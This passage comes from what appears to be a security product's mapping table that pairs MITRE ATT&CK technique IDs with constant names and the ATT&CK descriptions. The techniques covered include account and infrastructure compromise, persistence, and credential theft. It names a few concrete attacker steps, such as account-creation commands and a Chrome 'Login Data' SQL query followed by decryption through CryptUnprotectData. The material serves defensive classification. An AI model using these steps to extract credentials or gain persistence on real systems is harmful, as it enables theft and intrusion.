connected system to which the adversary has direct access. https://attack.mitre.org/techniques/T1092

T1586 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_ACCOUNTS Adversaries may compromise accounts with services that can be used during targeting. For operations
incorporating social engineering, the utilization of an online persona may be important. Rather than creating
and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries
may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a
potential victim if they have a relationship, or knowledge of, the compromised persona. A variety of
methods exist for compromising accounts, such as gathering credentials via [Phishing for Information]
(https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing
credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to
compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which
accounts to compromise to further their operation. Personas may exist on a single site or across multiple
sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional
development, this could include filling out or modifying profile information, further developing social
networks, or incorporating photos. Adversaries may directly leverage compromised email accounts for
[Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/
techniques/T1566). https://attack.mitre.org/techniques/T1586

T1586.002 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_ACCOUNTS_EMAIL_ACCOUNTS Adversaries may compromise email accounts that can be used during targeting. Adversaries can use
compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for
Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/
T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a
potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email
accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/
techniques/T1583/001)). A variety of methods exist for compromising email accounts, such as gathering
credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials
from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).
(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance
to inform decisions about which accounts to compromise to further their operation. Adversaries can use a
compromised email account to hijack existing email threads with targets of interest. https://attack.mitre.org/
techniques/T1586/002
Original Mapped Description

T1586.001 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_ACCOUNTS_SOCIAL_MEDIA_ACCOUNTS Adversaries may compromise social media accounts that can be used during targeting. For operations
incorporating social engineering, the utilization of an online persona may be important. Rather than creating
and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/
T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona
may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the
compromised persona. A variety of methods exist for compromising social media accounts, such as
gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing
credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential
dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct
Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.).
Compromised social media accounts may require additional development, this could include filling out or
modifying profile information, further developing social networks, or incorporating photos. Adversaries can
use a compromised social media profile to create new, or hijack existing, connections to targets of interest.
These connections may be direct or may include trying to connect through others.(Citation:
NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other
phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://
attack.mitre.org/techniques/T1566/003)). https://attack.mitre.org/techniques/T1586/001

T1554 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_CLIENT_SOFTWARE_BINARY Adversaries may modify client software binaries to establish persistent access to systems. Client software
enables users to access services provided by a server. Common client software types are SSH clients, FTP
clients, email clients, and web browsers. Adversaries may make modifications to client software binaries to
carry out malicious tasks when those applications are in use. For example, an adversary may copy source
code for the client software, add a backdoor, compile for the target, and replace the legitimate application
binary (or support files) with the backdoored one. Since these applications may be routinely executed by
the user, the adversary can leverage this for persistent access to the host. https://attack.mitre.org/
techniques/T1554

T1584 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure
solutions include physical or cloud servers, domains, and third-party web services. Instead of buying,
leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other
phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)
(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries
may compromise numerous machines to form a botnet they can leverage. Use of compromised
infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure
can help adversary operations blend in with traffic that is seen as normal, such as contact with high
reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their
actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other
adversaries.(Citation: NSA NCSC Turla OilRig) https://attack.mitre.org/techniques/T1584

T1584.005 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_BOTNET Adversaries may compromise numerous third-party systems to form a botnet that can be used during
targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated
tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser
service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising
numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as
redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their
disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/
techniques/T1566) or Distributed Denial of Service (DDoS). https://attack.mitre.org/techniques/T1584/005

T1584.002 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_DNS_SERVER Adversaries may compromise third-party DNS servers that can be used during targeting. During post-
compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and
Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up
their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By
compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an
organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos
DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create
subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation:
CiscoAngler)(Citation: Proofpoint Domain Shadowing) https://attack.mitre.org/techniques/T1584/002

T1584.001 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_DOMAINS Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration
hijacking is the act of changing the registration of a domain name without the permission of the original
registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for
the person listed as the owner of the domain. The adversary can then claim that they forgot their password
in order to make changes to the domain registration. Other possibilities include social engineering a domain
registration help desk to gain access to an account or taking advantage of renewal process gaps.
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or
deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct
operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
https://attack.mitre.org/techniques/T1584/001

T1584.004 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_SERVER Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows
an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may
utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server]
(https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/
techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by
Compromise](https://attack.mitre.org/techniques/T1189). https://attack.mitre.org/techniques/T1584/004

T1584.003 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_VIRTUAL_PRIVATE_SERVER Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting.
There exist a variety of cloud service providers that will sell virtual machines/containers as a service.
Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as
infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation:
NSA NCSC Turla OilRig) Compromising a VPS for use in later stages of the adversary lifecycle, such as
Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher
reputation cloud service providers as well as that added by the compromised third-party. https://
attack.mitre.org/techniques/T1584/003

T1584.006 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_WEB_SERVICES Adversaries may compromise access to third-party web services that can be used during targeting. A
variety of popular websites exist for legitimate users to register for web-based services, such as GitHub,
Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web
service and use that web service as infrastructure in support of cyber operations. Such web services can be
abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service]
(https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/
techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those
offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web
service, particularly when access is stolen from legitimate users, adversaries can make it difficult to
physically tie back operations to them. https://attack.mitre.org/techniques/T1584/006

T1609 XDM_CONST.MITRE_TECHNIQUE_CONTAINER_ADMINISTRATION_COMMAND Adversaries may abuse a container administration service to execute commands within a container. A
container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet
may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)
(Citation: Kubernetes API)(Citation: Kubernetes Kubelet) In Docker, adversaries may specify an entrypoint
during container deployment that executes a script or command, or they may use a command such as
docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation:
Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in
a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a
command such as kubectl exec.(Citation: Kubectl Exec Get Shell) https://attack.mitre.org/techniques/
T1609
Original Mapped Description

T1613 XDM_CONST.MITRE_TECHNIQUE_CONTAINER_AND_RESOURCE_DISCOVERY Adversaries may attempt to discover containers and other resources that are available within a containers
environment. Other resources may include images, deployments, pods, nodes, and other information such
as the status of a cluster. These resources can be viewed within web applications such as the Kubernetes
dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation:
Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s
configuration, which services are available, and what cloud provider the victim may be utilizing. The
discovery of these resources may inform an adversary’s next steps in the environment, such as how to
perform lateral movement and which methods to utilize for execution. https://attack.mitre.org/techniques/
T1613

T1136 XDM_CONST.MITRE_TECHNIQUE_CREATE_ACCOUNT Adversaries may create an account to maintain access to victim systems. With a sufficient level of access,
creating such accounts may be used to establish secondary credentialed access that do not require
persistent remote access tools to be deployed on the system. Accounts may be created on the local system
or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have
access to specific services, which can reduce the chance of detection. https://attack.mitre.org/techniques/
T1136

T1136.003 XDM_CONST.MITRE_TECHNIQUE_CREATE_ACCOUNT_CLOUD_ACCOUNT Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of
access, such accounts may be used to establish secondary credentialed access that does not require
persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)
(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)
(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) Adversaries may create
accounts that only have access to specific cloud services, which can reduce the chance of detection.
https://attack.mitre.org/techniques/T1136/003

T1136.002 XDM_CONST.MITRE_TECHNIQUE_CREATE_ACCOUNT_DOMAIN_ACCOUNT Adversaries may create a domain account to maintain access to victim systems. Domain accounts are
those managed by Active Directory Domain Services where access and permissions are configured across
systems and services that are part of that domain. Domain accounts can cover user, administrator, and
service accounts. With a sufficient level of access, the net user /add /domain command can be used to
create a domain account. Such accounts may be used to establish secondary credentialed access that do
not require persistent remote access tools to be deployed on the system. https://attack.mitre.org/
techniques/T1136/002

T1136.001 XDM_CONST.MITRE_TECHNIQUE_CREATE_ACCOUNT_LOCAL_ACCOUNT Adversaries may create a local account to maintain access to victim systems. Local accounts are those
configured by an organization for use by users, remote support, services, or for administration on a single
system or service. With a sufficient level of access, the net user /add command can be used to create a
local account. On macOS systems the dscl -create command can be used to create a local account.
Such accounts may be used to establish secondary credentialed access that do not require persistent
remote access tools to be deployed on the system. https://attack.mitre.org/techniques/T1136/001

T1543 XDM_CONST.MITRE_TECHNIQUE_CREATE_OR_MODIFY_SYSTEM_PROCESS Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part
of persistence. When operating systems boot up, they can start processes that perform background system
functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet
Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/
T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system
initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) Adversaries
may install new services, daemons, or agents that can be configured to execute at startup or a repeatable
interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or
agents to achieve the same effect. Services, daemons, or agents may be created with administrator
privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to
create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection).
https://attack.mitre.org/techniques/T1543

T1543.001 XDM_CONST.MITRE_TECHNIQUE_CREATE_OR_MODIFY_SYSTEM_PROCESS_LAUNCH_AGENT Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of
persistence. When a user logs in, a per-user launchd process is started which loads the parameters for
each launch-on-demand user agent from the property list (.plist) file found in /System/Library/
LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch
Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files
use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable
location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform
updates to programs, launch user specified programs at login, or to conduct other developer tasks. Launch
Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001)
command. Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the
appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)
(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a
name from the related operating system or benign software. Launch Agents are created with user level
privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus
for OS X) https://attack.mitre.org/techniques/T1543/001

T1543.004 XDM_CONST.MITRE_TECHNIQUE_CREATE_OR_MODIFY_SYSTEM_PROCESS_LAUNCH_DAEMON Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence.
Launch Daemons are plist files used to interact with Launchd, the service management framework used by
macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system
prior to login, and run in the background without the need for user interaction. During the macOS
initialization startup, the launchd process loads the parameters for launch-on-demand system-level
daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/.
Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to
the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide
access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch
Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
Adversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad
parameter set to true and the Program parameter set to the malicious executable path. The daemon name
may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading]
(https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits
administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection) Additionally, system
configuration changes (such as the installation of third party package managing software) may cause
folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to
allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation:
LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019) https://attack.mitre.org/
techniques/T1543/004

T1543.002 XDM_CONST.MITRE_TECHNIQUE_CREATE_OR_MODIFY_SYSTEM_PROCESS_SYSTEMD_SERVICE Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of
persistence. The systemd service manager is commonly used for managing background daemon
processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd
January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization
(init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora
15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible
with the aforementioned init systems. Systemd utilizes configuration files known as service units to control
how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/
system and /usr/lib/systemd/system directories and have the file extension .service. Each service
unit file may contain numerous directives that can execute system commands: * ExecStart, ExecStartPre,
and ExecStartPost directives cover execution of commands when a services is started manually by
'systemctl' or on system start if the service is set to automatically start. * ExecReload directive covers when
a service restarts. * ExecStop and ExecStopPost directives cover when a service is stopped or manually by
'systemctl'. Adversaries have used systemd functionality to establish persistent access to victim systems by
creating and/or modifying service unit files that cause systemd to execute malicious commands at system
boot.(Citation: Anomali Rocke March 2019) While adversaries typically require root privileges to create/
modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low
privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to
achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016) https://attack.mitre.org/
techniques/T1543/002
Original Mapped Description

T1543.003 XDM_CONST.MITRE_TECHNIQUE_CREATE_OR_MODIFY_SYSTEM_PROCESS_WINDOWS_SERVICE Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of
persistence. When Windows boots up, it starts programs or applications called services that perform
background system functions.(Citation: TechNet Services) Windows service configuration information,
including the file path to the service's executable or recovery programs/commands, is stored in the
Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://
attack.mitre.org/software/S0075). Adversaries may install a new service or modify an existing service by
using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to
interact with the Windows API. Adversaries may configure services to execute at startup in order to persist
on a system. An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036)
by using a service name from a related operating system or benign software, or by modifying existing
services to make detection analysis more challenging. Modifying existing services may interrupt their
functionality or may enable services that are disabled or otherwise not commonly used. Services may be
created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also
use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start
services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). https://
attack.mitre.org/techniques/T1543/003

T1555 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES Adversaries may search for common password storage locations to obtain user credentials. Passwords are
stored in several places on a system, depending on the operating system or application holding the
credentials. There are also specific applications that store passwords to make it easier for users manage
and maintain. Once credentials are obtained, they can be used to perform lateral movement and access
restricted information. https://attack.mitre.org/techniques/T1555

T1555.003 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES_CREDENTIALS_FROM_WEB_BROWSERS Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website
usernames and passwords so that they do not need to be entered manually in the future. Web browsers
typically store the credentials in an encrypted format within a credential store; however, methods exist to
extract plaintext credentials from web browsers. For example, on Windows systems, encrypted credentials
may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User
Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value,
password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted
credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon
credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018) Adversaries have
executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation:
Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows
stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows
Credential Manager](https://attack.mitre.org/techniques/T1555/004). Adversaries may also acquire
credentials by searching web browser process memory for patterns that commonly match credentials.
(Citation: GitHub Mimikittenz July 2016) After acquiring credentials from web browsers, adversaries may
attempt to recycle the credentials across different systems and/or accounts in order to expand access. This
can result in significantly furthering an adversary's objective in cases where credentials gained from web
browsers overlap with privileged accounts (e.g. domain administrator). https://attack.mitre.org/techniques/
T1555/003

T1555.001 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES_KEYCHAIN Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the
built-in way for macOS to keep track of users' passwords and credentials for many services and features
such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in
~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation:
Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a
useful way to manage these credentials. To manage their credentials, users have to use additional
credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they
can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By
default, the passphrase for the keychain is the user’s logon credentials. https://attack.mitre.org/techniques/
T1555/001

T1555.005 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES_PASSWORD_MANAGERS Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password
Manager February 2019) Password managers are applications designed to store user credentials, normally
in an encrypted database. Credentials are typically accessible after a user provides a master password that
unlocks the database. After the database is unlocked, these credentials may be copied to memory. These
databases can be stored as files on disk.(Citation: ise Password Manager February 2019) Adversaries may
acquire user credentials from password managers by extracting the master password and/or plain-text
credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries
may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/
techniques/T1212).(Citation: NVD CVE-2019-3610) Adversaries may also try brute forcing via [Password
Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password
manager.(Citation: Cyberreason Anchor December 2019) https://attack.mitre.org/techniques/T1555/005

T1555.002 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES_SECURITYD_MEMORY An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan
through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon
keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers,
certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware) In OS X prior to
El Capitan, users with root access can read plaintext keychain passwords of logged-in users because
Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly
prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s
securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in
memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master
key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS
X Keychain) https://attack.mitre.org/techniques/T1555/002

T1555.004 XDM_CONST.MITRE_TECHNIQUE_CREDENTIALS_FROM_PASSWORD_STORES_WINDOWS_CREDENTIAL_MANAGER Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager
stores credentials for signing into websites, applications, and/or devices that request authentication through
NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft
Credential Manager store)(Citation: Microsoft Credential Locker) The Windows Credential Manager
separates website credentials from application or network credentials in two lockers. As part of [Credentials
from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge
website credentials are managed by the Credential Manager and are stored in the Web Credentials locker.
Application and network credentials are stored in the Windows Credentials locker. Credential Lockers store
credentials in encrypted .vcrd files, located under %Systemdrive%\Users\
\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\. The encryption key can be found in
a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape
Windows Vault)(Citation: Malwarebytes The Windows Vault) Adversaries may list credentials managed by
the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows
executable that can be used to enumerate credentials stored in the Credential Locker through a command-
line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers.
Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the
Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.
(Citation: Malwarebytes The Windows Vault) https://attack.mitre.org/techniques/T1555/004
Original Mapped Description

T1485 XDM_CONST.MITRE_TECHNIQUE_DATA_DESTRUCTION Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt
availability to systems, services, and network resources. Data destruction is likely to render stored data
irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation:
Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)
(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer
2018) Common operating system file deletion commands such as del and rm often only remove pointers to
files without wiping the contents of the files themselves, making the files recoverable by proper forensic
methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/
T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual
files are destroyed rather than sections of a storage disk or the disk's logical structure. Adversaries may
attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation:
Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files
have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov
2016)(Citation: Kaspersky StoneDrill 2017) To maximize impact on the target organization in operations
where network-wide availability interruption is the goal, malware designed for destroying data may have
worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts]
(https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/
T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation:
Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)
(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018). In cloud environments,
adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and
other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data
Destruction - Threat Post)(Citation: DOJ - Cisco Insider) https://attack.mitre.org/techniques/T1485

T1132 XDM_CONST.MITRE_TECHNIQUE_DATA_ENCODING Adversaries may encode data to make the content of command and control traffic more difficult to detect.
Command and control (C2) information can be encoded using a standard data encoding system. Use of
data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64,
MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding)
(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data
compression, such as gzip. https://attack.mitre.org/techniques/T1132

T1132.002 XDM_CONST.MITRE_TECHNIQUE_DATA_ENCODING_NON_STANDARD_ENCODING Adversaries may encode data with a non-standard data encoding system to make the content of command
and control traffic more difficult to detect. Command and control (C2) information can be encoded using a
non-standard data encoding system that diverges from existing protocol specifications. Non-standard data
encoding schemes may be based on or related to standard data encoding schemes, such as a modified
Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding)
(Citation: Wikipedia Character Encoding) https://attack.mitre.org/techniques/T1132/002

T1132.001 XDM_CONST.MITRE_TECHNIQUE_DATA_ENCODING_STANDARD_ENCODING Adversaries may encode data with a standard data encoding system to make the content of command and
control traffic more difficult to detect. Command and control (C2) information can be encoded using a
standard data encoding system that adheres to existing protocol specifications. Common data encoding
schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text
